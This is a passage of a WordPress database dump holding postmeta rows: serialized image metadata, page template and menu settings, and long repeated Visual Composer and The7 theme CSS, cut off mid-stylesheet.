(35611,5196,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:859;s:4:\"file\";s:16:\"2023/08/d1-1.jpg\";s:8:\"filesize\";i:241797;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"d1-1-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15581;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"d1-1-1024x687.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:687;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151262;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"d1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7807;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"d1-1-768x515.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:515;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89289;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"d1-1-500x336.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:336;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39381;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:16:\"d1-1-800x537.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96752;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(35612,5197,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 115px !important;}.vc_custom_1689081933017{margin-top: 145px !important;}.vc_custom_1689081968974{margin-top: 160px !important;}.vc_custom_1689081968955{margin-top: 115px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35613,5197,'_wpb_shortcodes_custom_css_updated','1'),
(35614,5198,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 115px !important;}.vc_custom_1689081933017{margin-top: 145px !important;}.vc_custom_1689081968974{margin-top: 160px !important;}.vc_custom_1689081968955{margin-top: 115px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35615,5198,'_wpb_shortcodes_custom_css_updated','1'),
(35616,5199,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 115px !important;}.vc_custom_1689081933017{margin-top: 145px !important;}.vc_custom_1689081968974{margin-top: 160px !important;}.vc_custom_1689081968955{margin-top: 115px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35617,5199,'_wpb_shortcodes_custom_css_updated','1'),
(35618,4010,'_wp_page_template','default'),
(35619,4010,'_dt_microsite_primary_menu',''),
(35620,4010,'_dt_microsite_split_left_menu',''),
(35621,4010,'_dt_microsite_split_right_menu',''),
(35622,4010,'_dt_microsite_mobile_menu',''),
(35623,4010,'_dt_project_options_related_categories','a:1:{i:0;s:2:\"69\";}'),
(35662,3063,'_wpb_shortcodes_custom_css_updated','1'),
(35663,4725,'_wp_page_template','default'),
(35664,4725,'_dt_microsite_primary_menu',''),
(35665,4725,'_dt_microsite_split_left_menu',''),
(35666,4725,'_dt_microsite_split_right_menu',''),
(35667,4725,'_dt_microsite_mobile_menu',''),
(35668,5206,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 115px !important;}.vc_custom_1689081933017{margin-top: 145px !important;}.vc_custom_1689081968974{margin-top: 160px !important;}.vc_custom_1689081968955{margin-top: 115px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35669,5206,'_wpb_shortcodes_custom_css_updated','1'),
(35670,5207,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 115px !important;}.vc_custom_1689081933017{margin-top: 145px !important;}.vc_custom_1689081968974{margin-top: 160px !important;}.vc_custom_1689081968955{margin-top: 115px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35671,5207,'_wpb_shortcodes_custom_css_updated','1'),
(35672,3872,'rs_page_bg_color',''),
(35673,4010,'the7_shortcodes_dynamic_css','a:2:{s:32:\"fd084c7b2d27f05facb23e338620528e\";s:6509:\".dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e  .team-media {\n  padding: 5px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  